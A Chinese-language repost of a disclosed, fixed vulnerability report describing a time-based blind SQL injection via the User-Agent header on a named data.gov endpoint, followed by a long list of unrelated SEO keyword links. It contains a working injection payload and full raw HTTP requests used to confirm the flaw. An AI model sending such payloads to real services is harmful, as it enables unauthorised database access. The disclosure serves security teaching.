如何分析 HTTP头注入中的User-Agent注入
发表于:2025-02-04 作者:千家信息网编辑
千家信息网最后更新 2025年02月04日,如何分析 HTTP头注入中的User-Agent注入,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。漏洞信息发现者:har
千家信息网最后更新 2025年02月04日如何分析 HTTP头注入中的User-Agent注入
漏洞信息 发现者:harisec
前言 Harisec在以下网站中发现一个SQL注入漏洞,注入的位置在User-Agent。
漏洞再现
Harisec使用了盲注的方式来确认该漏洞
漏洞影响
如何分析 HTTP头注入中的User-Agent注入,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
漏洞种类:SQL注入
危害等级:严重
漏洞状态:已修复
https://labs.data.gov/dashboard/datagov/csv_to_json
例如:将User-Agent的值设置为
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
将导致服务器在25秒后响应
这里,我们看一下具体的数据包内容
GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
服务器在25秒后响应,与User-Agent的值相同
将User-Agent的值改一下,改成9秒后响应
GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(3*3),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
该漏洞可以使攻击者注入恶意的SQL语句。
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注行业资讯频道,感谢您对的支持。
漏洞
内容
服务器
帮助
服务
分析
清楚
相同
位置
信息
前言
发现者
可以使
对此
恶意
攻击者
数据
文章
新手
方式
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
电脑主板和服务器有什么区别
服务器无效响应12002
51为向互联网科技有限公司
杭州网络技术有限公司电话
如何新建数据库的表
如何开发ios软件开发
湖北省网络安全协会会长是谁
java语言操作数据库使用的是
管家婆数据库怎么关掉
c 交换输入的两个数据库
服务器搭建好后如何上广域网
三级网络技术分析化学
通信网络安全与防护习题答案
新建数据库不设置表能用么
网络安全等级保护实施日期
软件工程软件开发报告
黑暗之魂3自建服务器
启达天洛网络技术
数据库怎么把日期变成空
计算机三级考试网络技术考啥
网易星球网络安全吗
java语言操作数据库使用的是
软件开发行业中级证书有哪些
庐江品质网络技术咨询介绍
服务器搭建好后如何上广域网
全球服务器存储市场增长
点菜宝服务器怎么安装
数据库录入功能
关系数据库中所管理的关系是指
网络安全法考试开展情况